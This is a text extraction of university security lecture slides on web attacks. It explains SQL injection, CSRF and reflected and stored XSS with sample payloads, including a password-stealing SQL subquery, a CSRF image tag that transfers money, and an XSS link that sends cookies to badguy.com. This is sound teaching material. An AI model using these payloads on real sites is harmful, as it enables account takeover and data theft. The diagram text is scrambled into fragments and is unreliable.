Web Attacks con t CS 161 Computer Security Prof Vern Paxson TAs Devdatta Akhawe Mobin Javed Matthias Vallentin http inst eecs berkeley edu cs161 February 24 2011 Announcements Guest lecture a week from Thursday March 3rd Prof David Wagner Correction material will not be in scope for the Midterm My office hours the week of March 7th will be by appointment Homework 2 should be out by tonight due in 1 week Goals For Today Make previously discussed web attacks concrete SQL injection Cross site request forgery CSRF Reflected cross site scripting XSS Illustrate additional web attacks Stored XSS Clickjacking and discuss defenses SQL Injection Scenario Suppose web server front end stores URL parameter recipient in variable recipient and then builds up a string with the following SQL query sql SELECT PersonID FROM Person WHERE Balance 100 AND Username recipient How can recipient cause trouble here How can we see anyone s account SQL Injection Scenario con t WHERE Balance 100 AND Username recipient recipient foo OR 1 1 WHERE Balance 100 AND Username foo OR 1 1 Precedence comment makes this WHERE Balance 100 AND Username foo OR 1 1 Always true Demo Tools Bro freeware network monitoring tool Scriptable Primarily designed for real time intrusion detection www bro ids org Squigler Cool localhost web site s Python SQLite Developed by Arel Cordero Let me know if you d like a copy to play with def post squig user squig if not user or not squig return conn sqlite3 connect DBFN c conn cursor c executescript INSERT INTO squigs VALUES s s datetime now user squig conn commit Server code for posting a squig c close INSERT INTO squigs VALUES dilbert don t contractions work date Syntax error INSERT INTO squigs VALUES dilbert select password from accounts where username bob date INSERT INTO squigs VALUES dilbert select password from accounts where username bob Empty string literals date INSERT INTO squigs VALUES dilbert select password from accounts where username bob Concatenation operator date Concatenation of string S with empty string is just S INSERT INTO squigs VALUES dilbert select password from accounts where username bob date Value of the squig will be Bob s password Web Accesses w Side Effects Recall our earlier banking URL http mybank com moneyxfer cgi account alice amt 50 to bob So what happens if we visit evilsite com which includes img src http mybank com moneyxfer cgi Account alice amt 500000 to DrEvil Cross Site Request Forgery CSRF attack URL fetch for posting a squig Request to 127 0 0 1 8080 GET do squig redirect 2Fuserpage 3Fuser 3Ddilbert squig squigs speak a deep truth HOST localhost 8080 REFERER http localhost 8080 userpage user dilbert COOKIE session id 5321506 Web action with side effect URL fetch for posting a squig Request to 127 0 0 1 8080 GET do squig redirect 2Fuserpage 3Fuser 3Ddilbert squig squigs speak a deep truth HOST localhost 8080 REFERER http localhost 8080 userpage user dilbert COOKIE session id 5321506 Authenticated with cookie that browser automatically sends along Subversive Script Execution Cross Site Scripting XSS Attacker s goal cause victim s browser to execute Javascript written by the attacker but with the browser believing that the script instead was sent by a trust server mybank com In order to circumvent the Same Origin Policy SOP which will prevent the browser from letting Javascript received directly from evil com to have full access to content from mybank com Do not confuse with CSRF CSRF is about web requests with side effects XSS is about getting Javascript treated as though a trusted server sent it The Setup User input is echoed into HTML response Example search field http victim com search php term apple search php responds with HTML TITLE Search Results TITLE BODY Results for php echo GET term BODY HTML How can an attacker exploit this 16 Injection Via Bad Input Consider link properly URL encoded http victim com search php term script window open http badguy com cookie document cookie script What if user clicks on this link 1 Browser goes to victim com search php 2 victim com returns HTML Results for script script 3 Browser executes script in same origin as victim com Sends badguy com cookie for victim com Or any other arbitrary execution rewrite victim com page 17 Demo on 1 Finding and 2 Exploiting Reflected XSS vulnerabilities Cross Site Scripting XSS Victim client Cross Site Scripting XSS 1 Victim client site b e w visit Attack Server Cross Site Scripting XSS site b e w 1 visit age p s u lic io a m e iv 2 re c e Victim client Attack Server Cross Site Scripting XSS site b e w 1 visit age p s u lic io a m e iv 2 re c e Attack Server Exact URL under attacker s control Victim client 3 c lic k on l in k Server Patsy Victim Cross Site Scripting XSS site b e w 1 visit age p s u lic io a m e iv 2 re c e Victim client 4 3 ech c lic k o us on l e r in in k put Attack Server Server Patsy Victim Cross Site Scripting XSS site b e w 1 visit age p s u lic io a m e iv 2 re c e Victim client 4 5 execute script embedded in input as though server meant us to run it 3 ech c lic k o us on l e r in in k put Attack Server Server Patsy Victim Cross Site Scripting XSS site b e w 1 visit age p s u lic io a m e iv 2 re c e Victim client 5 4 6 3 ech pe rf execute script embedded in input as though server meant us to run it c lic k o us orm on l e r in atta in k put cke r acti on Attack Server Server Patsy Victim Cross Site Scripting XSS site b e w 1 visit age p s u lic io a m e iv 2 re c e data e l b a d v a lu n e s 7 And Or Victim client 4 5 execute script embedded in input as though server meant us to run it 3 ech c lic k o us on l e r in in k put Attack Server Server Patsy Victim Cross Site Scripting XSS site b e w 1 visit age p s u lic io a m e iv 2 re c e data e l b a d v a lu n e s 7 Victim client 5 4 6 3 ech pe rf execute script embedded in input as though server meant us to run it Reflected XSS attacks c lic k o us orm Attack Server on l e r in atta in k put cke r acti on Server Patsy Victim Stored Cross Site Scripting Attack Server Stored Cross Site Scripting Attack Server 1 Inject malicious script Server Patsy Victim Stored Cross Site Scripting Attack Server 1 User Victim Inject malicious script Server Patsy Victim …
View Full Document
Unlocking...